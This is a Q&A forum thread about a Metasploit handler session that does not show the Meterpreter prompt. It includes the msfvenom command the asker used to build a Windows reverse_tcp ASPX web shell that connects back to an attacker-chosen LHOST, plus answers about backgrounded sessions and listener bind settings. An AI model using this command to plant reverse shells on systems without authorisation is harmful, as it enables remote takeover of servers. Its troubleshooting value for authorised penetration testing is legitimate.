4

I have created a payload to a website with msfvenom, and started the exploit/multi/handler listener, they then connect to each other and create a meterpreter session as seen below. The problem is, I do not get the meterpreter prompt which I should get and typing any commands just moves me back into the msf exploit(handler) prompt. Has anyone ever experienced this before? I am using Parrot OS and the payload is created with the following command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx

enter image description here

UndercoverDog
  • 612
  • 2
  • 17
ipmev12
  • 43
  • 1
  • 3

2 Answers2

8

The Meterpreter session has gone to the background, which is default behaviour for Metasploit now.

To view the background sessions:

sessions -l

To interact with the session:

sessions -i <session id>
Joe
  • 2,734
  • 2
  • 12
  • 22
  • I ran into the same issue, but unfortunately I cannot interact with metasploit in any way, in this state. Except `ctrl-c`ing out of it. What am I missing? -.- – d4Rk Sep 07 '19 at 19:38
  • Ah, I see, I can/have to actually ctrl-c out first... really confusing. – d4Rk Sep 07 '19 at 20:12
  • The only way I can run this is by ctrl-c-ing out, but then it doesn't show a session. – CATboardBETA May 28 '21 at 21:53
0

Using Ctrl + C and then session -i wont help, since the connection has been dropped already and executing meterpreter commands will return unknown.

Just set ReverseListenerBindAddress along with LHOST, this solved the issue for me.

PS: ReverseListenerBindAddress gotta be same value as LHOST in reverse_tcp.

iBUYPOWER
  • 1
  • 1